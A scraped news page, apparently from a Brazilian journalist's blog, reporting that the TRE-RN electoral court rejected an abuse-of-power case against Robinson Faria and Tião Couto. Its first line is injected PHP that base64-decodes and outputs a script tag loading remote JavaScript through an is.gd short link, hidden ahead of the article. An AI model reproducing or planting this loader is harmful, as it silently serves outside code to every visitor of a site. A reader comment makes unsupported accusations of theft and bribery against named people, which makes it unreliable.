$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

TRE-RN julga improcedente ação de investigação judicial contra Robinson Faria e Tião Couto

TRE-RN julga improcedente ação de investigação judicial contra Robinson Faria e Tião Couto
12 Set 2019

O Tribunal Regional Eleitoral do Rio Grande do Norte (TRE-RN) julgou improcedente, por 4 votos a 3, a Ação de Investigação Judicial Eleitoral (AIJE) contra Robinson Faria (PSD) e Tião Couto (PR), candidatos a governador e vice nas Eleições de 2018. O processo foi analisado na sessão desta quarta-feira (11), após o juiz Carlos Wagner ter pedido vista dos autos para melhor análise do caso. A ação foi movida pelo Partido Socialismo e Liberdade – PSOL do RN alegando suposto abuso de poder político em episódio envolvendo a inauguração do Complexo Viário da Redinha, em Natal, cuja obra ainda não havia sido concluída.

De acordo com o investigante, a entrega foi realizada dois dias antes do prazo que veda a participação de candidatos em cerimônias públicas de inaugurações. Após análise do processo, sob relatoria do Desembargador Cornélio Alves, a Corte Eleitoral, à unanimidade, julgou improcedente o pedido ao investigado Tião Couto. E, por voto de desempate, vencidos os juízes Carlos Wagner, José Dantas de Paiva e Ricardo Tinôco, opinou também pela improcedência quanto a Robinson Faria. No entendimento do relator, a improcedência se deu pela ausência de provas robustas que apontassem para a condenação dos envolvidos.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Comments

  1. QUANTO O TRE/RN EMPACOTOU PARA JULGAR IMPROCEDENTE AS AÇÕES CONTRA O SR. ROBINSON FARIA
    E SEU FILHO FÁBIO PATRICIA ABRAVANEL FARIA QUE ROUBARAM OS CONSIGNADOS DOS SERVIDORES E EMBOLSARAM NOSSO 13º E DEZEMBRO DE 2018. ELES DEVERIAM SEREM JULGADOS A DEVOLVEREM NOSSOS SALÁRIOS COM JUROS E CORREÇÃO MONETÁRIA. AO MEU VER A DÍVIDA NAO É DO ESTADO E SIM DO SR. ROBINSON FARIA E SEU FILHO QUE USARAM DA POSIÇÃO PARA ROUBAR A TODOS NÓS SERVIDORES. INFELIZMENTE MAIS UMA VEZ A (IN)JUSTIÇA ELEITORAL FOI FEITA A FAVOR DE BANDIDOS TRAVESTIDOS DE POLÍTICOS.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *